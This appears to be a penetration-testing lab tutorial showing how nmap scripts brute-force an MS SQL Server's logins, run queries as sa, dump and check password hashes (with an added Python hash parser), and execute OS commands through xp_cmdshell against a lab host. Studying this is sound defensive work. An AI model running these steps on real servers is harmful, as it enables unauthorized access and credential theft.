
Penetration testing of MSSQL using Nmap

Author: Hetian Cyber Security Laboratory

Use nmap scripts to perform penetration tests against MS SQL Server and obtain information such as target usernames and database tables.

# Preparation

Attacker machine: Kali (with nmap installed)

Target machine: Windows Server 2019 (with SQL Server 2016 installed)

nmap ships with a set of scripts for this kind of testing; the ones for MSSQL can be listed with the following command:

$ locate '*.nse' | grep ms-sql
/usr/share/nmap/scripts/broadcast-ms-sql-discover.nse
/usr/share/nmap/scripts/ms-sql-brute.nse
/usr/share/nmap/scripts/ms-sql-config.nse
/usr/share/nmap/scripts/ms-sql-dac.nse
/usr/share/nmap/scripts/ms-sql-dump-hashes.nse
/usr/share/nmap/scripts/ms-sql-empty-password.nse
/usr/share/nmap/scripts/ms-sql-hasdbaccess.nse
/usr/share/nmap/scripts/ms-sql-info.nse
/usr/share/nmap/scripts/ms-sql-ntlm-info.nse
/usr/share/nmap/scripts/ms-sql-query.nse
/usr/share/nmap/scripts/ms-sql-tables.nse
/usr/share/nmap/scripts/ms-sql-xp-cmdshell.nse

# Obtaining database version information

Use the ms-sql-info script to obtain information such as the version of the target database:

nmap -p 1433 -Pn --script ms-sql-info 192.168.91.133
# -p selects the port; -Pn skips host discovery (no ping); --script selects the script to run

The information obtained is shown in a screenshot in the original post, which is not reproduced here.

# User credential brute-forcing

Use the ms-sql-brute script to brute-force database usernames and passwords from wordlists:

nmap -p 1433 -Pn --script ms-sql-brute --script-args userdb=mssql_user.txt,passdb=mssql_pass.txt 192.168.91.133
# --script-args passes script arguments; userdb= is the username wordlist, passdb= the password wordlist

The results are shown in a screenshot in the original post, which is not reproduced here.

The usernames and passwords obtained:

sa:Password@123
pentest:123456

# Executing SQL statements

Using the credentials obtained earlier, you can call nmap's ms-sql-query script to execute SQL queries on the target.

Here's how to use it:

nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="<SQL query>" 192.168.91.133

List all databases on the target:

nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="sp_databases" 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 01:57 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00051s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-query: 
|   [192.168.91.133:1433]
|     Query: sp_databases
|       DATABASE_NAME	DATABASE_SIZE	REMARKS
|       =============	=============	=======
|       master	7552	Null
|       model	16384	Null
|       msdb	21888	Null
|_      tempdb	16384	Null

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds


# NetBIOS information gathering

Use the ms-sql-ntlm-info script to collect NetBIOS information from a remote SQL Server host on which NTLM authentication is enabled.

The principle is that sending an MS-TDS NTLM authentication request with an invalid domain and null credentials makes the remote service respond with an NTLMSSP message that discloses information including the NetBIOS names, DNS names and OS version.

nmap -p1433 -Pn --script ms-sql-ntlm-info 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:08 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00053s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-ntlm-info: 
|   Target_Name: WIN-8EIGFF6H8PR
|   NetBIOS_Domain_Name: WIN-8EIGFF6H8PR
|   NetBIOS_Computer_Name: WIN-8EIGFF6H8PR
|   DNS_Domain_Name: WIN-8EIGFF6H8PR
|   DNS_Computer_Name: WIN-8EIGFF6H8PR
|_  Product_Version: 10.0.17763

# MSSQL password hash dump

The ms-sql-dump-hashes script exports the MSSQL password hashes in a format that tools such as John the Ripper can consume.

nmap -p 1433 -Pn --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:22 EDT
Nmap scan report for 192.168.91.133
Host is up (0.0011s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-dump-hashes: 
| [192.168.91.133:1433]
|     sa:0x02002df771b8ffe860cb75e4bea87df48dd2fc38c35566eed3bf636aa962b2a24768387120df74d775627ea8ab10cd2339b525706fa0f68cbdff4580fcfddef2cb98493cce87
|     ##MS_PolicyEventProcessingLogin##:0x02001be8e4066350f72d7043e3b6fe080efb16a0cf424a4a1f078d84509d013946acaf49c08fdb534044432e474422769e4d43baa399bb094aa532e1333f6ec9c4eb01b4120c
|     ##MS_PolicyTsqlExecutionLogin##:0x02002f2e008251ee080daa07829e49ef4baf8624e26bc34a37096691751f83b4d7122f8bf1015db9ba5a519f483da5d366712c0fc54f8250ae8ce38db43e8e9f616cd0faab97
|_    pentest:0x020025bc596aaf94a1f764ccaca6cd6d0615cfba0f01140879c21df33959e492254ef66d53ddbfb0c961e3f04bfb376294d7194fcd61b0b6b85b06387d6f975b92a779544ab6

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

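The hash layout matters for a defender's own password audit as much as for cracking. The following is an added example (not from the original post, and not nmap's or John the Ripper's code) in Python: it splits a dumped hash into version, salt and digest, and recomputes the hash for a candidate password. Version 0x0200 (SQL Server 2012 and later, the form seen above) is SHA-512 over the UTF-16LE password followed by the 4-byte salt; version 0x0100 (SQL Server 2005 through 2008 R2) is SHA-1 over the same input. The audit helper takes a mapping of login to hash (a DBA can read the same values from the password_hash column of sys.sql_logins) and reports which logins use a password from a supplied weak-password list. The hashes in the usage section are constructed by the script itself, reusing only the salt from the sa hash above; the page's real digests are not claimed to match any password here.

```python
import hashlib
import hmac

# Hash version prefixes used by SQL Server: version -> (algorithm, digest length in bytes)
HASH_ALGOS = {0x0200: ("sha512", 64), 0x0100: ("sha1", 20)}


def parse_mssql_hash(hash_str):
    """Split '0x<version><salt><digest>' as printed by ms-sql-dump-hashes."""
    h = hash_str.strip()
    if h[:2].lower() == "0x":
        h = h[2:]
    raw = bytes.fromhex(h)
    version = int.from_bytes(raw[:2], "big")
    salt, digest = raw[2:6], raw[6:]
    if version not in HASH_ALGOS or len(digest) != HASH_ALGOS[version][1]:
        raise ValueError(f"unsupported hash: version 0x{version:04x}, digest {len(digest)} bytes")
    return {"version": version, "algo": HASH_ALGOS[version][0], "salt": salt, "digest": digest}


def mssql_hash(password, salt, version=0x0200):
    """Compute H(UTF-16LE(password) || salt) and render it in the dump format."""
    algo = HASH_ALGOS[version][0]
    digest = hashlib.new(algo, password.encode("utf-16-le") + salt).digest()
    return "0x" + version.to_bytes(2, "big").hex() + salt.hex() + digest.hex()


def verify_password(hash_str, candidate):
    """True if candidate is the password behind hash_str (constant-time compare)."""
    p = parse_mssql_hash(hash_str)
    recomputed = hashlib.new(p["algo"], candidate.encode("utf-16-le") + p["salt"]).digest()
    return hmac.compare_digest(recomputed, p["digest"])


def audit_weak_logins(login_hashes, weak_passwords):
    """Return {login: matched_password} for logins whose hash matches a weak password."""
    hits = {}
    for login, h in login_hashes.items():
        for pw in weak_passwords:
            if verify_password(h, pw):
                hits[login] = pw
                break
    return hits


if __name__ == "__main__":
    # Constructed sample: salt taken from the sa hash above, digests computed here
    salt = bytes.fromhex("2df771b8")
    sample = {
        "sa": mssql_hash("Password@123", salt),
        "pentest": mssql_hash("123456", salt),
        "svc_report": mssql_hash("Correct-Horse-Battery-7!", salt),
    }
    print(audit_weak_logins(sample, ["123456", "password", "Password@123"]))
```

Because every login carries its own random salt, a weak-password list has to be hashed once per login; that per-login cost is the same thing that makes the dump worth protecting, since an attacker with the hashes can run the same loop at full speed offline.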

# Command execution

xp_cmdshell is a feature of Microsoft SQL Server that lets system administrators execute operating system commands. It is disabled by default. If xp_cmdshell is enabled on the target server, the ms-sql-xp-cmdshell script can be used to execute system commands on the target machine.

nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133
# ms-sql-xp-cmdshell.cmd= specifies the command to execute

nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:28 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00047s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-xp-cmdshell: 
|   [192.168.91.133:1433]
|     Command: ipconfig
|       output
|       ======
|       Null
|       Windows IP \xE9\x85\x8D\xE7\xBD\xAE
|       Null
|       Null
|       \xE4\xBB\xA5\xE5\xA4\xAA\xE7\xBD\x91\xE9\x80\x82\xE9\x85\x8D\xE5\x99\xA8 Ethernet0:
|       Null
|          \xE8\xBF\x9E\xE6\x8E\xA5\xE7\x89\xB9\xE5\xAE\x9A\xE7\x9A\x84 DNS \xE5\x90\x8E\xE7\xBC\x80 . . . . . . . : localdomain
|          \xE6\x9C\xAC\xE5\x9C\xB0\xE9\x93\xBE\xE6\x8E\xA5 IPv6 \xE5\x9C\xB0\xE5\x9D\x80. . . . . . . . : fe80::c0cf:a5e8:ba66:9b8d%6
|          IPv4 \xE5\x9C\xB0\xE5\x9D\x80 . . . . . . . . . . . . : 192.168.91.133
|          \xE5\xAD\x90\xE7\xBD\x91\xE6\x8E\xA9\xE7\xA0\x81  . . . . . . . . . . . . : 255.255.255.0
|          \xE9\xBB\x98\xE8\xAE\xA4\xE7\xBD\x91\xE5\x85\xB3. . . . . . . . . . . . . : 192.168.91.2
|_      Null
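The \xHH sequences in the output above are not corruption: the TDS result set comes back as UCS-2, nmap's mssql library converts it to UTF-8, and nmap escapes each non-ASCII byte in its normal output as \xHH, so a three-byte Chinese character appears as three escapes. Here, as an added example (not part of the original post, and not nmap's code), is a small Python decoder that reassembles the bytes before decoding, so the Chinese ipconfig labels come back intact; a truncated multi-byte sequence is rendered as U+FFFD instead of raising. The two sample lines are constructed copies of lines from the output above.

```python
import re

_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_nmap_escapes(line, encoding="utf-8"):
    """Rebuild the original bytes of an nmap output line and decode them once.

    Decoding escape by escape would break multi-byte UTF-8 characters, so all
    literal text and escaped bytes are collected into one buffer first.
    """
    buf = bytearray()
    pos = 0
    for m in _ESCAPE.finditer(line):
        buf += line[pos:m.start()].encode(encoding)
        buf.append(int(m.group(1), 16))
        pos = m.end()
    buf += line[pos:].encode(encoding)
    # errors="replace" turns a truncated sequence into U+FFFD rather than raising
    return buf.decode(encoding, errors="replace")


def decode_script_output(text, encoding="utf-8"):
    """Decode every line of a pasted '| script:' block, keeping the '|' prefixes."""
    return "\n".join(decode_nmap_escapes(line, encoding) for line in text.splitlines())


if __name__ == "__main__":
    # Constructed sample: two lines copied from the xp_cmdshell output above
    sample = (
        r"|       Windows IP \xE9\x85\x8D\xE7\xBD\xAE" + "\n"
        r"|       \xE4\xBB\xA5\xE5\xA4\xAA\xE7\xBD\x91\xE9\x80\x82\xE9\x85\x8D\xE5\x99\xA8 Ethernet0:"
    )
    print(decode_script_output(sample))
```

If the scan output is written with -oX instead, nmap stores the script output as XML text rather than escaped bytes, and this step is not needed.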

# Empty-password login test

If the administrator leaves the password empty, an attacker can log in to the database directly.

You can use the ms-sql-empty-password script to test whether the target SQL Server accepts an empty-password login:

nmap -p1433 -Pn --script ms-sql-empty-password 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:36 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00056s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-empty-password: 
|   [192.168.91.133:1433]
|_    sa:<empty> => Login Success

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

# Viewing database tables

The ms-sql-tables script lists the database tables on the target.

Tip: by default an MSSQL instance has no user databases (only the system databases listed earlier), so you need to create a database and insert tables first, otherwise the script below reports an error.

nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
nmap -p1433 -Pn --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 04:28 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00079s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-tables: 
|   [192.168.91.133:1433]
|       pentest
|         table	column	type	length
|         =====	======	====	======
|         Table_1	password	nchar	40
|         Table_1	username	nchar	40
|       
|       Restrictions
|         Output restricted to 2 tables (see ms-sql-tables.maxtables)
|         Output restricted to 5 databases (see ms-sql-tables.maxdb)
|_        No filter (see ms-sql-tables.keywords)

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds